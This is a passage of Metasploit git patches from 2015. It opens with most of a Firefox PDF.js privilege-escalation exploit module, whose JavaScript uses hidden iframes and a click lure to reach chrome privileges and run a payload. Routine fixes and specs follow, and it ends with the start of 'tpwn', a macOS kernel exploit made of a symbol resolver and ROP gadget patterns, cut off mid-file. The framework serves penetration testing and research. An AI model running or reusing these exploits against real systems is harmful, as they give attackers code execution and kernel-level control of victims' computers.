+        'Marius Mlynski', # discovery and pwn2own exploit
+        'joev'     # copypasta monkey, CVE-2015-0802
+      ],
+      'License'     => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2015-0816'], # pdf.js can load chrome://
+          ['CVE', '2015-0802']  # can access messageManager property in chrome window
+        ],
+      'Targets' => [
+        [
+          'Universal (Javascript XPCOM Shell)', {
+            'Platform' => 'firefox',
+            'Arch' => ARCH_FIREFOX
+          }
+        ],
+        [
+          'Native Payload', {
+            'Platform' => %w{ java linux osx solaris win },
+            'Arch'     => ARCH_ALL
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(35, 36) }
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status('Sending exploit...')
+    send_response_html(cli, html)
+  end
+
+  def html
+    "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+
+    "<script>#{js}</script></body></html>"
+  end
+
+  def default_html
+    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
+  end
+
+  def js
+    key = Rex::Text.rand_text_alpha(5 + rand(12))
+    frame = Rex::Text.rand_text_alpha(5 + rand(12))
+    r = Rex::Text.rand_text_alpha(5 + rand(12))
+    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+    <<-EOJS
+function xml2string(obj) {
+  return new XMLSerializer().serializeToString(obj);
+}
+
+function __proto(obj) {
+  return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
+}
+
+function get(path, callback, timeout, template, value) {
+  callback = _(callback);
+  if (template && value) {
+    callback = callback.replace(template, value);
+  }
+  js_call1 = 'javascript:' + _(function() {
+    try {
+      done = false;
+      window.onclick = function() {
+        if (done) { return; } done = true;
+        q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
+        setTimeout(function(){
+          q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
+
+            setTimeout(function(){
+              var opts = #{JSON.unparse(opts)};
+              var key = opts['#{key}'];
+              q.messageManager.loadFrameScript('data:,'+key, false);
+              setTimeout(function(){
+                q.close();
+              }, 100)
+            }, 100)
+        }, 100);
+      }
+    } catch (e) {
+      history.back();
+    }
+    undefined;
+  }, "%url%", path);
+  js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
+  sandboxContext(_(function() {
+    p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+    l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+    l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
+  }));
+  setTimeout((function() {
+    sandboxContext(_(function() {
+      p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+      l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+      l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
+    }));
+  }), timeout);
+}
+
+function get_data(obj) {
+  data = null;
+  try {
+    data = obj.document.documentElement.innerHTML;
+    if (data.indexOf('dirListing') < 0) {
+      throw new Error();
+    }
+  } catch (e) {
+    if (this.document instanceof XMLDocument) {
+        data = xml2string(this.document);
+    } else {
+      try {
+          if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
+              data = this.document.body.firstChild.textContent;
+          } else {
+              throw new Error();
+          }
+      } catch (e) {
+        try {
+          if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
+              return null;
+          } else {
+              throw new Error();
+          }
+        } catch (e) {
+          ;;
+        }
+      }
+    }
+  }
+  return data;
+}
+
+function _(s, template, value) {
+  s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
+  s = s.substring(0, s.length - 1);
+  if (template && value) {
+    s = s.replace(template, value);
+  }
+  s += __proto;
+  s += xml2string;
+  s += get_data;
+  s = s.replace(/\\s\\/\\/.*\\n/g, "");
+  s = s + ";undefined";
+  return s;
+}
+
+function get_sandbox_context() {
+  if (window.my_win_id == null) {
+    for (var i = 0; i < 20; i++) {
+      try {
+        if (window[i].location.toString().indexOf("view-source:") != -1) {
+          my_win_id = i;
+          break;
+        }
+      } catch (e) {}
+    }
+  };
+  if (window.my_win_id == null)
+    return;
+  clearInterval(sandbox_context_i);
+  object.data = 'view-source:' + blobURL;
+  window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
+  object.data = 'data:text/html,<'+'html/>';
+  window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
+    '"position:absolute; left:-9999px;" onload = "'+_(function(){
+    window.wrappedJSObject.sandboxContext=(function(cmd) {
+      with(importFunction.constructor('return this')()) {
+        return eval(cmd);
+      }
+    });
+  }) + '"/>');
+}
+
+var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
+var i = document.createElement("iframe");
+i.id = "i";
+i.style=HIDDEN;
+i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
+document.documentElement.appendChild(i);
+i.onload = function() {
+  if (this.contentDocument.styleSheets.length > 0) {
+    var i2 = document.createElement("iframe");
+    i2.id = "i2";
+    i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
+    i2.height = window.innerHeight+'px';
+    i2.width = window.innerWidth+'px';
+    i2.src = "data:application/pdf,";
+    document.documentElement.appendChild(i2);
+    pdfBlob = new Blob([''], {
+        type: 'application/pdf'
+    });
+    blobURL = URL.createObjectURL(pdfBlob);
+    object = document.createElement('object');
+    object.style=HIDDEN;
+    object.data = 'data:application/pdf,';
+    object.onload = (function() {
+        sandbox_context_i = setInterval(get_sandbox_context, 200);
+        object.onload = null;
+        object.data = 'view-source:' + location.href;
+        return;
+    });
+    document.documentElement.appendChild(object);
+  } else {
+    this.contentWindow.location.reload();
+  }
+}
+
+document.body.style.height = window.innerHeight+'px';
+
+var kill = setInterval(function() {
+  if (window.sandboxContext) {
+    var f = "chrome://browser/content/browser.xul";
+    get(f, function() {}, 0, "%URL%", f);
+    clearInterval(kill);
+  } else {
+    return;
+  }
+},20);
+
+EOJS
+  end
+end
diff --git a/modules/exploits/multi/browser/firefox_proxy_prototype.rb b/modules/exploits/multi/browser/firefox_proxy_prototype.rb
index afaa21317a..8da445326f 100644
--- a/modules/exploits/multi/browser/firefox_proxy_prototype.rb
+++ b/modules/exploits/multi/browser/firefox_proxy_prototype.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
       ],
       'DisclosureDate' => "Jan 20 2014",
       'References' => [
-        ['CVE', '2014-8636'],
+        ['CVE', '2014-8636'], # proxy injection
+        ['CVE', '2015-0802'], # can access messageManager property in chrome window
         ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],
         ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]
 

From 98e2d074c39477ecb667183ed18d48b1bd3337b3 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 15 Aug 2015 20:08:06 -0500
Subject: [PATCH 0994/1013] Add disclosure date.

---
 .../multi/browser/firefox_pdfjs_privilege_escalation.rb        | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
index 6f189edac5..7cf0100b51 100644
--- a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
+++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
@@ -21,10 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
         trigger the vulnerability.
       },
       'Author'         => [
-        'Unknown', # PDF.js injection injection code was taken from a 0day
+        'Unknown', # PDF.js injection code was taken from a 0day
         'Marius Mlynski', # discovery and pwn2own exploit
         'joev'     # copypasta monkey, CVE-2015-0802
       ],
+      'DisclosureDate' => "Mar 31 2015",
       'License'     => MSF_LICENSE,
       'References' =>
         [

From 92958bdf8b2620c50f1e51616736d53c8f62ff9b Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sun, 16 Aug 2015 11:21:22 -0500
Subject: [PATCH 0995/1013] prefer && to 'and' for consistent
 order-of-operations

---
 lib/msf/core/handler/reverse_http.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 6a92c6e416..fb643c2fea 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -94,7 +94,7 @@ module ReverseHttp
     callback_host = nil
 
     # Extract whatever the client sent us in the Host header
-    if req and req.headers and req.headers['Host']
+    if req && req.headers && req.headers['Host']
       callback_host = req.headers['Host']
     end
 

From a5bed0198a2b3017fe1bd3cfc3d1a87069d64d70 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 17 Aug 2015 11:08:40 -0500
Subject: [PATCH 0996/1013] Use each_char

---
 modules/nops/x64/simple.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb
index 7f4f84e2c5..765a636309 100644
--- a/modules/nops/x64/simple.rb
+++ b/modules/nops/x64/simple.rb
@@ -218,7 +218,7 @@ class Metasploit3 < Msf::Nop
     INSTRUCTIONS.each do | instruction |
       good = true;
       # If the instruction contains some bad chars we wont use it...
-      badchars.each do | bc |
+      badchars.each_char do | bc |
         if instruction[I_OP].include?( bc )
           good = false
           break

From 0aa958dac0f1c3bf3f16fbba0cf6347be2c36e94 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 17 Aug 2015 13:47:52 -0500
Subject: [PATCH 0997/1013] Allow unserialization on hosts v5

---
 lib/msf/core/db_manager/import/metasploit_framework/xml.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/db_manager/import/metasploit_framework/xml.rb b/lib/msf/core/db_manager/import/metasploit_framework/xml.rb
index 6a5ac28cd0..8ca86081fa 100644
--- a/lib/msf/core/db_manager/import/metasploit_framework/xml.rb
+++ b/lib/msf/core/db_manager/import/metasploit_framework/xml.rb
@@ -241,7 +241,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
       host_data = {}
       host_data[:task] = args[:task]
       host_data[:workspace] = wspace
-      host_data[:host] = nils_for_nulls(host.elements["address"].text.to_s.strip)
+      host_data[:host] = nils_for_nulls(unserialize_object(host.elements["address"]))
       if bl.include? host_data[:host]
         next
       else

From c52da9f50d16987b3f07ea04dd27b58e3f8ae9cb Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Mon, 17 Aug 2015 14:26:51 -0500
Subject: [PATCH 0998/1013] Add regression spec for #5856

---
 spec/lib/msf/core/payload_generator_spec.rb | 71 +++++++++++++++++----
 1 file changed, 60 insertions(+), 11 deletions(-)

diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb
index a61ab5f9e5..7759d8c831 100644
--- a/spec/lib/msf/core/payload_generator_spec.rb
+++ b/spec/lib/msf/core/payload_generator_spec.rb
@@ -347,28 +347,77 @@ describe Msf::PayloadGenerator do
   end
 
   context '#prepend_nops' do
-    before(:each) do
-      load_and_create_module(
-          module_type: 'nop',
-          reference_name: 'x86/opty2'
-      )
-    end
-
     context 'when nops are set to 0' do
+      let(:nops) { 0 }
+
+      before(:each) do
+        load_and_create_module(
+            module_type: 'nop',
+            reference_name: 'x86/opty2'
+        )
+      end
+
       it 'returns the unmodified shellcode' do
         expect(payload_generator.prepend_nops(shellcode)).to eq shellcode
       end
     end
 
     context 'when nops are set to more than 0' do
+      let(:badchars) { "" }
       let(:nops) { 20 }
 
-      it 'returns shellcode of the correct size' do
-        expect(payload_generator.prepend_nops(shellcode).length).to eq 24
+      context 'when payload is x86' do
+        before(:each) do
+          load_and_create_module(
+            module_type: 'nop',
+            reference_name: 'x86/opty2'
+          )
+        end
+
+        it 'returns shellcode of the correct size' do
+          final = payload_generator.prepend_nops(shellcode)
+          puts "in spec, x86 final: #{final.inspect}"
+          expect(final.length).to eq 24
+        end
+
+        it 'puts the nops in front of the original shellcode' do
+          expect(payload_generator.prepend_nops(shellcode)[20,24]).to eq shellcode
+        end
+
       end
 
-      it 'puts the nops in front of the original shellcode' do
-        expect(payload_generator.prepend_nops(shellcode)[20,24]).to eq shellcode
+      context 'when payload is Windows x64' do
+        let(:arch) { 'x86_64' }
+        let(:payload_module) {
+          load_and_create_module(
+            ancestor_reference_names: %w{
+                stagers/windows/x64/reverse_tcp
+                stages/windows/x64/meterpreter
+            },
+            module_type: 'payload',
+            reference_name: 'windows/x64/meterpreter/reverse_tcp'
+          )
+        }
+
+        before(:each) do
+          load_and_create_module(
+              module_type: 'nop',
+              reference_name: 'x64/simple'
+          )
+        end
+
+        it 'returns shellcode of the correct size' do
+          final = payload_generator.prepend_nops(shellcode)
+          puts "in spec, x86_64 final: #{final.inspect}"
+          expect(final.length).to eq(nops+shellcode.length)
+        end
+
+        it 'puts the nops in front of the original shellcode' do
+          final = payload_generator.prepend_nops(shellcode)
+          expect(final[nops,nops+shellcode.length]).to eq shellcode
+        end
+
+
       end
     end
   end

From 0bb01c8b6bb0e2c37df26dfe46ccc6c70b07de91 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 17 Aug 2015 14:40:15 -0500
Subject: [PATCH 0999/1013] Fix nil bug with an empty database.yml

Use an empty hash instead of false.
---
 lib/msf/ui/console/driver.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index 3148e680d3..b067392452 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -169,7 +169,7 @@ class Driver < Msf::Ui::Driver
 
         unless configuration_pathname.nil?
           if configuration_pathname.readable?
-            dbinfo = YAML.load_file(configuration_pathname)
+            dbinfo = YAML.load_file(configuration_pathname) || {}
             dbenv  = opts['DatabaseEnv'] || Rails.env
             db     = dbinfo[dbenv]
           else

From 02e3e9af163f11c277f1a301ed69c304484a4251 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 17 Aug 2015 14:52:26 -0500
Subject: [PATCH 1000/1013] Allow to compare ipv4 vs ipv6 hosts

---
 lib/rex/ui/text/table.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/lib/rex/ui/text/table.rb b/lib/rex/ui/text/table.rb
index 87b660d6c6..52da87c5f4 100644
--- a/lib/rex/ui/text/table.rb
+++ b/lib/rex/ui/text/table.rb
@@ -203,6 +203,10 @@ class Table
         cmp = Rex::Socket::addr_atoi(a[index]) <=> Rex::Socket::addr_atoi(b[index])
       elsif a[index] =~ /^[0-9]+$/ and b[index] =~ /^[0-9]+$/
         cmp = a[index].to_i <=> b[index].to_i
+      elsif a[index].kind_of?(IPAddr) && a[index].kind_of?(IPAddr) && a[index].ipv6? && b[index].ipv4?
+        cmp = 1
+      elsif a[index].kind_of?(IPAddr) && b[index].kind_of?(IPAddr) && a[index].ipv4? && b[index].ipv6?
+        cmp = -1
       else
         cmp = a[index] <=> b[index] # assumes otherwise comparable.
       end

From 09c888bc49356802f920ff09da47247e84701733 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 17 Aug 2015 15:27:26 -0500
Subject: [PATCH 1001/1013] Fix minor things

---
 spec/lib/msf/core/payload_generator_spec.rb | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)

diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb
index 7759d8c831..7dd44048bc 100644
--- a/spec/lib/msf/core/payload_generator_spec.rb
+++ b/spec/lib/msf/core/payload_generator_spec.rb
@@ -363,7 +363,7 @@ describe Msf::PayloadGenerator do
     end
 
     context 'when nops are set to more than 0' do
-      let(:badchars) { "" }
+      let(:badchars) { '' }
       let(:nops) { 20 }
 
       context 'when payload is x86' do
@@ -408,16 +408,14 @@ describe Msf::PayloadGenerator do
 
         it 'returns shellcode of the correct size' do
           final = payload_generator.prepend_nops(shellcode)
-          puts "in spec, x86_64 final: #{final.inspect}"
-          expect(final.length).to eq(nops+shellcode.length)
+          expect(final.length).to eq(nops + shellcode.length)
         end
 
         it 'puts the nops in front of the original shellcode' do
           final = payload_generator.prepend_nops(shellcode)
-          expect(final[nops,nops+shellcode.length]).to eq shellcode
+          expect(final[nops, nops + shellcode.length]).to eq shellcode
         end
 
-
       end
     end
   end

From 0a7ac2d75848a4603abdde5e859cd471f91993e7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 17 Aug 2015 15:28:48 -0500
Subject: [PATCH 1002/1013] Delete another debug puts

---
 spec/lib/msf/core/payload_generator_spec.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb
index 7dd44048bc..7a707e41af 100644
--- a/spec/lib/msf/core/payload_generator_spec.rb
+++ b/spec/lib/msf/core/payload_generator_spec.rb
@@ -376,7 +376,6 @@ describe Msf::PayloadGenerator do
 
         it 'returns shellcode of the correct size' do
           final = payload_generator.prepend_nops(shellcode)
-          puts "in spec, x86 final: #{final.inspect}"
           expect(final.length).to eq 24
         end
 

From efc980074c1fc0142237ac53a78c455f469c5930 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 17 Aug 2015 16:36:36 -0500
Subject: [PATCH 1003/1013] Add tpwn exploit files

---
 data/exploits/tpwn/Makefile       |   3 +
 data/exploits/tpwn/import.h       |  34 ++++
 data/exploits/tpwn/lsym.h         |  47 +++++
 data/exploits/tpwn/lsym.m         | 159 +++++++++++++++++
 data/exploits/tpwn/lsym_gadgets.h |  69 +++++++
 data/exploits/tpwn/main.m         | 286 ++++++++++++++++++++++++++++++
 data/exploits/tpwn/tpwn           | Bin 0 -> 31484 bytes
 7 files changed, 598 insertions(+)
 create mode 100644 data/exploits/tpwn/Makefile
 create mode 100644 data/exploits/tpwn/import.h
 create mode 100644 data/exploits/tpwn/lsym.h
 create mode 100644 data/exploits/tpwn/lsym.m
 create mode 100644 data/exploits/tpwn/lsym_gadgets.h
 create mode 100644 data/exploits/tpwn/main.m
 create mode 100755 data/exploits/tpwn/tpwn

diff --git a/data/exploits/tpwn/Makefile b/data/exploits/tpwn/Makefile
new file mode 100644
index 0000000000..dfecee38e4
--- /dev/null
+++ b/data/exploits/tpwn/Makefile
@@ -0,0 +1,3 @@
+all:
+	gcc *.m -o tpwn -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
+	strip tpwn
diff --git a/data/exploits/tpwn/import.h b/data/exploits/tpwn/import.h
new file mode 100644
index 0000000000..cf0a0354f4
--- /dev/null
+++ b/data/exploits/tpwn/import.h
@@ -0,0 +1,34 @@
+#ifndef pwn_import_h
+#define pwn_import_h
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+
+#include <IOKit/IOKitLib.h>
+#include <CoreFoundation/CoreFoundation.h>
+#include <IOKit/IOKitLib.h>
+#include <dlfcn.h>
+#include  <string.h>
+#include <mach/mach_types.h>
+#include <mach-o/loader.h>
+#include <sys/types.h>
+#include <mach-o/nlist.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+
+#include "lsym.h"
+#include "lsym_gadgets.h"
+
+#endif
diff --git a/data/exploits/tpwn/lsym.h b/data/exploits/tpwn/lsym.h
new file mode 100644
index 0000000000..eaa1d417d9
--- /dev/null
+++ b/data/exploits/tpwn/lsym.h
@@ -0,0 +1,47 @@
+#ifndef __pwn__lsym__
+#define __pwn__lsym__
+
+#include <stdio.h>
+#include "import.h"
+
+#define JUNK_VALUE 0x1337133713371337
+
+
+typedef struct kernel_fake_stack {
+    uint64_t __cnt;
+    uint64_t __padding[0x4999];
+    uint64_t __rop_chain[0x5000];
+} kernel_fake_stack_t;
+
+#define LSYM_PAYLOAD_VTABLE 1
+
+struct segment_command_64 *find_segment_64(struct mach_header_64 *mh, const char *segname);
+struct section_64 *find_section_64(struct segment_command_64 *seg, const char *name);
+struct load_command *find_load_command(struct mach_header_64 *mh, uint32_t cmd);
+
+typedef struct lsym_map {
+    void* map;
+    const char* path;
+    size_t sz;
+} lsym_map_t;
+
+typedef enum {
+    LSYM_DO_NOT_REBASE = (1 << 0)
+} lsym_gadget_flags;
+
+typedef uint64_t lsym_map_pointer_t;
+typedef uint64_t lsym_kern_pointer_t;
+typedef uint64_t lsym_slidden_kern_pointer_t;
+typedef uint64_t lsym_offset_t;
+
+lsym_kern_pointer_t         kext_pointer(const char* identifier);
+lsym_map_t                 *lsym_map_file(const char *path);
+lsym_kern_pointer_t         lsym_find_symbol(lsym_map_t *mapping, const char *name);
+lsym_kern_pointer_t         lsym_find_gadget(lsym_map_t *mapping, const char *bytes, const uint32_t size, const lsym_gadget_flags flags);
+lsym_kern_pointer_t         lsym_kernel_base(lsym_map_t *mapping);
+lsym_slidden_kern_pointer_t lsym_slide_pointer(lsym_kern_pointer_t pointer);
+lsym_offset_t               lsym_vm_addrperm();
+
+typedef struct kernel_exploit_vector kernel_exploit_vector_t;
+
+#endif /* defined(__pwn__lsym__) */
diff --git a/data/exploits/tpwn/lsym.m b/data/exploits/tpwn/lsym.m
new file mode 100644
index 0000000000..5ac22b512b
--- /dev/null
+++ b/data/exploits/tpwn/lsym.m
@@ -0,0 +1,159 @@
+#include "lsym.h"
+#import <Foundation/Foundation.h>
+
+#include <IOKit/IOKitLib.h>
+
+struct segment_command_64 *find_segment_64(struct mach_header_64 *mh, const char *segname);
+struct section_64 *find_section_64(struct segment_command_64 *seg, const char *name);
+struct load_command *find_load_command(struct mach_header_64 *mh, uint32_t cmd);
+extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
+
+
+extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
+#ifdef FIND_KERNEL_SLIDE
+static lsym_offset_t kaslr_slide=0;
+static char kaslr_slide_found   =0;
+#endif
+
+__attribute__((always_inline))
+lsym_kern_pointer_t kext_pointer(const char* identifier){
+    return (lsym_kern_pointer_t)[((NSNumber*)(((__bridge NSDictionary*)OSKextCopyLoadedKextInfo(NULL, NULL))[[NSString stringWithUTF8String:identifier]][@"OSBundleLoadAddress"])) unsignedLongLongValue];
+}
+
+__attribute__((always_inline))
+lsym_map_t *lsym_map_file(const char *path) {
+    int fd=open(path, O_RDONLY);
+if(fd < 0) return 0;
+    struct stat sb;
+    fstat(fd, &sb);
+    if (sb.st_size < 0x1000) {
+        return 0;
+    }
+    void* map = mmap(NULL, sb.st_size  & 0xFFFFFFFF, PROT_READ, MAP_SHARED, fd, 0);
+    lsym_map_t* ret = (lsym_map_t*)malloc(sizeof(lsym_map_t));
+    ret->map  = map;
+    ret->path = path;
+    ret->sz = sb.st_size & 0xFFFFFFFF;
+    return ret;
+}
+
+__attribute__((always_inline))
+lsym_kern_pointer_t lsym_find_gadget(lsym_map_t *mapping, const char *bytes, const uint32_t size, const lsym_gadget_flags flags) {
+    lsym_offset_t off=(lsym_offset_t)memmem(mapping->map, mapping->sz, bytes, size);
+    if (!off) {
+        puts("[-] Couldn't find a ROP gadget, aborting.");
+        exit(1);
+    }
+    return lsym_slide_pointer(((flags & LSYM_DO_NOT_REBASE) == 0 ? lsym_kernel_base(mapping) : 0)+(off - (lsym_offset_t) mapping->map));
+}
+
+__attribute__((always_inline))
+lsym_kern_pointer_t lsym_kernel_base(lsym_map_t *mapping) {
+    struct mach_header_64 *mh = mapping->map;
+    struct segment_command_64 *text = find_segment_64(mh, SEG_TEXT);
+    return (lsym_kern_pointer_t)text->vmaddr;
+}
+__attribute__((always_inline))
+lsym_kern_pointer_t lsym_find_symbol(lsym_map_t *mapping, const char *name) {
+    struct mach_header_64 *mh = mapping->map;
+    struct symtab_command *symtab = NULL;
+    struct segment_command_64 *linkedit = NULL;    
+    /*
+     * Check header
+     */
+    if (mh->magic != MH_MAGIC_64) {
+        return (lsym_kern_pointer_t)NULL;
+    }
+    
+    /*
+     * Find the LINKEDIT and SYMTAB sections
+     */
+    linkedit = find_segment_64(mh, SEG_LINKEDIT);
+    if (!linkedit) {
+        return (lsym_kern_pointer_t)NULL;
+    }
+    
+    symtab = (struct symtab_command *)find_load_command(mh, LC_SYMTAB);
+    if (!symtab) {
+        return (lsym_kern_pointer_t)NULL;
+    }
+    void* symtabp = symtab->stroff + 4 + (char*)mh;
+    void* symtabz = symtab->stroff + (char*)mh;
+    void* symendp = symtab->stroff + (char*)mh + symtab->strsize - 0xA;
+    uint32_t idx = 0;
+    while (symtabp < symendp) {
+        if(strcmp(symtabp, name) == 0) goto found;
+        symtabp += strlen((char*)symtabp) + 1;
+        idx++;
+    }
+    printf("[-] symbol %s not resolved.\n", name); exit(0);
+    return (lsym_kern_pointer_t)NULL;
+found:;
+    struct nlist_64* nlp = (struct nlist_64*) (((uint32_t)(symtab->symoff)) + (char*)mh);
+    uint64_t strx = ((char*)symtabp - (char*)symtabz);
+    unsigned int symp = 0;
+    while(symp <= (symtab->nsyms)) {
+        uint32_t strix = *((uint32_t*)nlp);
+        if(strix == strx)
+            goto found1;
+        nlp ++; //sizeof(struct nlist_64);
+        symp++;
+    }
+    printf("[-] symbol not found: %s\n", name);
+    exit(-1);
+found1:
+    //printf("[+] found symbol %s at 0x%016llx\n", name, nlp->n_value);
+    return (lsym_kern_pointer_t)nlp->n_value;
+
+}
+
+__attribute__((always_inline))
+struct segment_command_64 *find_segment_64(struct mach_header_64 *mh, const char *segname)
+{
+    struct load_command *lc;
+    struct segment_command_64 *s, *fs = NULL;
+    lc = (struct load_command *)((uint64_t)mh + sizeof(struct mach_header_64));
+    while ((uint64_t)lc < (uint64_t)mh + (uint64_t)mh->sizeofcmds) {
+        if (lc->cmd == LC_SEGMENT_64) {
+            s = (struct segment_command_64 *)lc;
+            if (!strcmp(s->segname, segname)) {
+                fs = s;
+                break;
+            }
+        }
+        lc = (struct load_command *)((uint64_t)lc + (uint64_t)lc->cmdsize);
+    }
+    return fs;
+}
+
+__attribute__((always_inline))
+struct section_64 *find_section_64(struct segment_command_64 *seg, const char *name)
+{
+    struct section_64 *sect, *fs = NULL;
+    uint32_t i = 0;
+    for (i = 0, sect = (struct section_64 *)((uint64_t)seg + (uint64_t)sizeof(struct segment_command_64));
+         i < seg->nsects;
+         i++, sect = (struct section_64 *)((uint64_t)sect + sizeof(struct section_64)))
+    {
+        if (!strcmp(sect->sectname, name)) {
+            fs = sect;
+            break;
+        }
+    }
+    return fs;
+}
+
+__attribute__((always_inline))
+struct load_command *find_load_command(struct mach_header_64 *mh, uint32_t cmd)
+{
+    struct load_command *lc, *flc;
+    lc = (struct load_command *)((uint64_t)mh + sizeof(struct mach_header_64));
+    while ((uint64_t)lc < (uint64_t)mh + (uint64_t)mh->sizeofcmds) {
+        if (lc->cmd == cmd) {
+            flc = (struct load_command *)lc;
+            break;
+        }
+        lc = (struct load_command *)((uint64_t)lc + (uint64_t)lc->cmdsize);
+    }
+    return flc;
+}
diff --git a/data/exploits/tpwn/lsym_gadgets.h b/data/exploits/tpwn/lsym_gadgets.h
new file mode 100644
index 0000000000..a6616e4ca5
--- /dev/null
+++ b/data/exploits/tpwn/lsym_gadgets.h
@@ -0,0 +1,69 @@
+#ifndef ROP_PIVOT_RAX
+/* Short verion of lsym_slide_pointer(lsym_find_symbol()) */
+
+#define RESOLVE_SYMBOL(map, name) lsym_slide_pointer(lsym_find_symbol(map, name))
+
+/* ROP gadgets present in 10.10 */
+
+// stack pivot
+#define ROP_PIVOT_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e, 0x41, 0x5F, 0x5D, 0xC3}), 13, 0)
+#define ROP_POP_R14_R15_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x41, 0x5e, 0x41, 0x5F, 0x5D, 0xC3}), 6, 0)
+#define ROP_R14_TO_RCX_CALL_pRAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x4C,0x89,0xF1,0xFF,0x10}), 5, 0)
+#define ROP_R14_TO_RDI_CALL_pRAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x4C,0x89,0xF7,0xFF,0x10}), 5, 0)
+
+#define ROP_AND_RCX_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x21,0xc8,0x5d,0xC3}), 5 , 0)
+#define ROP_OR_RCX_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x09,0xc8,0x5d,0xC3}), 5 , 0)
+#define ROP_RCX_TO_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0xBA, 0x48, 0x89, 0xC1, 0x48, 0x89, 0xC8, 0x5D, 0xC3}), 9 , 0)
+
